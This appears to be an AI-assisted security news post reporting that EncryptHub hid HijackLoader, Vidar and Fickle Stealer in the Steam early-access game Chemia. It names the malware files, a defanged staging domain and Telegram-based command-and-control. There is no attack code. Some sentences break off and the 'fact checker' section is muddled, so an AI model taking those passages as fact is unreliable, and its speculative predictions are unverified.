Listen to this Post
A Silent Attack Hidden in a Game Millions Trust
Steam, the
Malware Hidden Behind a Game: How the Attack Unfolded
The threat began when EncryptHub inserted a malware loader, HijackLoader (CVKRUTNP.exe), into the game Chemia, currently listed as early access on Steam. This loader immediately established persistence on infected machines and downloaded another malicious program known as Vidar infostealer (v9d9d.exe). The attackers cleverly embedded the malware’s command-and-control (C2) server details in a Telegram channel, allowing them to stay off traditional detection radars.
Just three hours after the initial malware was deployed, a second payload called Fickle Stealer was injected into the game via a DLL file named cclib.dll. This second-stage malware was activated using PowerShell scripts, which fetched the primary payload from a compromised domain (soft-gets[.]com). Fickle Stealer’s function was clear — it was built to scrape sensitive data from web browsers, including passwords, auto-fill data, cookies, and even cryptocurrency wallet information.
EncryptHub isn’t new to this game. The group has previously executed a global spear-phishing campaign that compromised more than 600 organizations. Despite their criminal actions, they remain a strange anomaly in the cybercrime space — they have also been linked to responsible disclosures of zero-day vulnerabilities to Microsoft. This dual nature makes them unpredictable and more dangerous.
The malware was particularly stealthy, affecting only background processes and leaving the game’s performance untouched. This means gamers playing Chemia had no idea they were infected. Researchers believe there may have been an insider involved, as it’s still unclear how the malicious files were embedded in the game’s build. So far, the game developer, Aether Forge Studios, and Steam’s parent company Valve have remained silent. The game remains available for download, and users are strongly advised to avoid it until a verified clean version is released.
This incident marks the third time in 2025 that malware has been found in a Steam-hosted game, following Sniper: Phantom’s Resolution in March and PirateFi in February. All affected titles were early access games — a pattern that suggests Steam’s review process for unreleased content might be dangerously lax.
What Undercode Say:
Exploiting Platform Trust
EncryptHub’s tactic wasn’t just technical — it was psychological. By injecting malware into a legitimate-looking game on Steam, they exploited a fundamental layer of trust. Gamers tend to assume that anything available on a platform like Steam has been vetted and is safe. This assumption gives threat actors an easy pass, especially with early access titles that might skip rigorous security screening.
Weaponizing Early Access Titles
Early access games offer hackers the perfect Trojan horse. These unfinished titles often receive fewer scrutiny layers, both from Steam moderators and players. With gamers eager to test out new indie experiences, attackers can quietly blend malware into the code without raising suspicion. Chemia, like Sniper: Phantom’s Resolution and PirateFi before it, exemplifies how early access status can be weaponized.
Advanced Persistence Techniques
EncryptHub used HijackLoader to create a foothold on users’ systems, with capabilities designed to maintain persistence even after reboots. This level of sophistication indicates an attacker well-versed in malware delivery pipelines, capable of bypassing standard antivirus protections. By layering loaders with secondary payloads like Vidar and Fickle Stealer, the group ensured a more robust infection cycle.
Telegram-Based C2: A Dangerous Trend
Using Telegram for command-and-control communications is becoming increasingly common among threat actors. It’s encrypted, widespread, and hard to shut down. By hiding C2 details in a Telegram channel, EncryptHub avoids exposing IP addresses or domains that defenders could block. This makes attribution and mitigation significantly more difficult.
A Suspicious Silence from Developers
One glaring issue is the silence from both Aether Forge Studios and Valve. With the game still live and potentially dangerous, their lack of public comment is not just irresponsible — it’s dangerous. Whether this was an internal compromise, a hijacked account, or outright negligence, the absence of transparency leaves users vulnerable.
When Malware Doesn’t Affect Performance
Gamers often rely on performance issues as a sign of malware. But EncryptHub’s stealth strategy proves that malware can run quietly in the background while leaving the game unaffected. This invisibility boosts the malware’s dwell time, allowing attackers to harvest more data without triggering any alarms.
History Repeats Itself on Steam
With three malware incidents in less than a year, Steam’s early access catalog is quickly becoming a threat vector. Valve may need to reconsider its review protocols, especially for indie titles from lesser-known developers. Without enhanced safeguards, this won’t be the last time gamers get caught off guard.
Cross-Campaign Infrastructure Reuse
The use of similar tools, like Fickle Stealer, across past campaigns and this one hints at EncryptHub’s reuse of infrastructure. This behavior is a double-edged sword — it helps researchers track patterns but also shows how mature and scalable their operations have become.
Insider Threats in Game Development
One unsettling possibility is insider involvement. If EncryptHub had access to the game’s backend, either through collusion or a compromised developer account, it raises serious questions about internal security practices in indie studios. Vetting developers, contractors, and collaborators must become a higher priority.
A Warning for All Gamers
This isn’t just about one game.
🔍 Fact Checker Results:
✅ EncryptHub did use HijackLoader and Fickle Stealer in
✅ The malware was retrieved from a Telegram channel and used PowerShell loaders
❌ No public response has yet been issued by Aether Forge Studios or Valve
📊 Prediction:
🎮 Expect tighter Steam controls on early access games within the next six months
🔒 Security audits for indie developers will become more common after public pressure
🧠 More threat actors may follow EncryptHub’s blueprint, hiding malware in gaming platforms due to their vast, trusting user base
References:
Reported By: www.bleepingcomputer.com
Extra Source Hub:
https://www.medium.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
